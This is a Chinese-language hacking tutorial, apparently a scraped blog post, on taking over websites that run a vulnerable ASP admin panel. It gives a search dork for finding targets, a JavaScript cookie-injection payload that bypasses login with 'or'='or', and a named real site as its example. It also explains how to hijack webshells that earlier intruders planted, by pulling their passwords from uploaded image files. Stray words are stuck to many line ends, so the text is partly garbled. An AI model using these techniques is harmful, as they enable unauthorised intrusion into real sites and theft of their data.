1. 百度或google搜索存在漏洞的网站: inurl:szwyadmin/login.aspjavascript
2. 会出现一些login.asp后缀的网站后台,随便进去一个,例如:java
3. 随便点击进去一个,有的进去了不可以提权,要耐心找,反复找浏览器
接下来点进去后会出现这样的画面:cookie
这个站我已经试过了,能够成功进入后台的,而后利用工具包(最简单的拿站方法,里面有教你提权和放大马)的一段代码破解,里面有说。工具
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));网站
将这段代码放到你点开的后台地址上,会出现如下状况为可进入google
一直enter键按下去,最后会出现url
表示能够进入。spa
而后将事先的那个站台地址http://www.hbsy.cn/rsc/szwyadmin/login.asp后缀login.asp改为图片
admin_index.asp,点击Eenter键就能够进入,以下
而后找到上传文件点击会出现一些图片:
通常从尾页往上页翻找后缀是 .asp形式的后台地址,好比找到如下几种形式的都能进入后台的:
随便点开一个,例如选个sy.asp(别人进入后台的路径)
咱们须要找他上传的文件,就是打叉的没有成功的文件,里面有记载这些高手的密码
| 122085 B |
2012-7-28 17:38:40 |
2012-7-26 0:47:23 |
看打叉的文件日期和他同样的,都是7—2号的,下载下来图片,用记事本打开
例如我找到了这个图片时间和后面的日期同样,就把它下载下来
用记事本下载下来找出他的密码:
密码是Userpass形式的,这个最终找出的密码是“1314”。将其复制,而后粘贴到事先找到别人的那个后台路径:
而后就出来最终的结果了:
在里面你能够找你想看的数据,方法不仅这一种,最好的方法仍是用那个最简单的工具拿站比较好,由于那是本身拿下来的!!这个方法也很好,喜欢的朋友能够相互传看下